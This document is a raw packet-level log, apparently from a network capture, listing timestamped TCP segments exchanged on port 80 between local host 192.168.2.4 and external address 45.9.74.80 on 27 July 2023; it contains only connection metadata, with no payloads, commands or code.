Jul 27, 2023 20:18:59.888808012 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.888866901 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.888885975 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.888935089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.888948917 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.888978004 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.889012098 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.889058113 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.889096975 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.889147997 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.889161110 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.889204979 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.889224052 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.889267921 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.889312029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.889355898 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.889374018 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.889420986 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.889444113 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.889487982 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.889532089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.889578104 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.889597893 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.889645100 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.889666080 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.889714003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.890094995 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.899501085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.899544001 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.899574041 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.899605036 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.900789976 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.900825977 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.900854111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.900883913 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.900913000 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.900940895 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.900983095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.900999069 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.901021957 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.901040077 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.901194096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.901283026 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.901788950 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.901839972 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.901884079 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.901942015 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.903212070 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.903265953 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.903280973 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.903328896 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.903373957 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.903415918 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.903439045 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.903476954 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.903503895 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.909291029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.909343958 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.909446001 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.912673950 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.912724018 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.912745953 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.912792921 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.912837029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.912878036 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.912899017 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.912935972 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.912964106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.913011074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.913064957 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.913078070 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.913124084 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.913276911 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.913319111 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.913343906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.913381100 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.913409948 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.913522005 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.914088011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.914133072 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.914158106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.914197922 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.914222002 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.914267063 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.914311886 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.914355993 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.914376020 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.914421082 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.914441109 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.914485931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.914522886 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.914546967 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.914592981 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.914637089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.914676905 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.914700985 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.914746046 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.914763927 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.914808035 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.914853096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.914901972 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.914920092 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.914966106 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.914984941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.915030956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.915076017 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.915100098 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.915144920 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.915189981 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.915230989 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.915254116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.915297985 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.915317059 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.915363073 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.915407896 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.915448904 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.915469885 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.915513992 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.915535927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.915582895 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.915628910 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.915668964 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.915692091 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.915730000 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.915755987 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.915797949 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.915841103 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.915884972 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.915908098 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.915950060 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.915967941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.916012049 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.916055918 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.916100979 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.916121960 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.916167974 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.916218996 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.916232109 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.916292906 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.916371107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.916423082 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.916467905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.916515112 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.921809912 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.921860933 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.921928883 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.921967030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.922223091 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.923660040 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.923707962 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.923753977 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.923810959 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.923825026 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.923867941 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.923892975 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.923938990 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.923991919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.924005985 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.924051046 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.924098969 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.924125910 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.924165010 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.924218893 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.924232960 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.924313068 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.924379110 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.926291943 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.926345110 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.926388979 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.926433086 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.926453114 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.926476002 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.926515102 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.932889938 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.932945013 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.933023930 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.933053017 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.933085918 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.935309887 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.935365915 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.935412884 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.935458899 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.935482979 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.935511112 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.935570955 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.935633898 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.935693026 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.935746908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.935760975 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.935792923 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.935823917 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.935869932 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.935934067 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.935991049 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.938654900 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.938704014 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.938746929 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.938782930 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.938811064 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.938855886 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.938916922 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.938961029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.939013958 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.939028978 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.939068079 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.939095020 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.939141035 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.939186096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.939232111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.939251900 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.939290047 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.939313889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.939361095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.939424038 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.939477921 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.939491034 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.939532995 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.939553022 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.939599991 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.939665079 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.939718008 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.939733028 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.939766884 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.939798117 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.939845085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.939889908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.939964056 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.939982891 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.940033913 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.940074921 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.940123081 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.940175056 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.940188885 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.940232038 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.940310955 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.940362930 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.940383911 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.940418959 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.940464973 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.940516949 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.940558910 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.940612078 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.940625906 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.940659046 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.940695047 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.940740108 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.940784931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.940851927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.940865993 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.940902948 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.940928936 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.940972090 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.941034079 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.941091061 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.941128016 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.941181898 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.941195011 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.941239119 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.941283941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.941334963 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.941348076 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.941382885 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.941411018 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.942322016 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.944134951 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.944279909 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.946652889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.946706057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.946755886 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.946779013 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.946824074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.946872950 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.946922064 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.946938992 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.946985960 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.947005987 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.947053909 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.947101116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.947143078 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.947165012 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.947212934 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.947237015 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.947290897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.948643923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.948700905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.948721886 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.948748112 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.948790073 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.955338001 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.955394983 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.955442905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.955472946 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.955492020 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.955527067 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.955574989 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.955621958 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.955676079 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.955688953 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.955724001 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.958517075 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.958579063 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.958645105 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.958661079 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.958718061 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.958775997 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.958828926 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.958862066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.958914995 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.958950996 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.959009886 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.959075928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.959129095 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.959160089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.959212065 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.963156939 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.963617086 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.963680029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.963747025 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.963776112 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.963849068 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.963920116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.964000940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.964045048 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.964071989 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.964140892 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.964207888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.964303017 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.964375019 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.964421034 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.964451075 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.964493990 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.964555025 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.964615107 CEST	80	49693	45.9.74.80	192.168.2.4
